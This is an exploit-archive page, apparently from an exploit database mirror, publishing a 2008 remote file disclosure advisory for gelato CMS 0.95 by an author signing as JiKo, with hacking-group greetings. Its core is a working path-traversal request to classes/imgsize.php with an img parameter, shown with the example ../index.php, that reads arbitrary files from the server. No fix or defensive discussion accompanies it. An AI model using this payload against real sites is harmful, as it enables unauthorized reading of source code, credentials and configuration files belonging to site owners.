[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : gelato CMS 0.95 (img) Remote File Disclosure Vulnerability
# Published : 2008-08-13
# Author : JiKo
# Previous Title : DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities
# Next Title : BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability


=---------------------------------------------=
=                ,.:oO0^-^0Oo:.,              =
=                      JIKO                   =
=                '':0Oov-voO0:''              =
=---------------------------------------------=
----------------------=JIKO=-------------------
| Autor    :> jiko
| Home     :> WwW.No-Exploit.CoM
| Script   :> gelato CMS
| Bug      :> Remote File Disclosure Vulnerability
| Download :> http://www.gelatocms.com/
_______________________________________________
=                   JIKI TEAm                 =
_______________________________________________
| Exploit:
.:|http://localhost/[Script]/classes/imgsize.php?img=[file]
~EX
.:|http://localhost/[script]/classes/imgsize.php?img=../index.php
| Greetz :
.:| Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
----------------------=JIKO=-------------------
=---------------------------------------------=
=                   JIKI TEAm                 =
=---------------------------------------------=

# www.Syue.com [2008-08-13]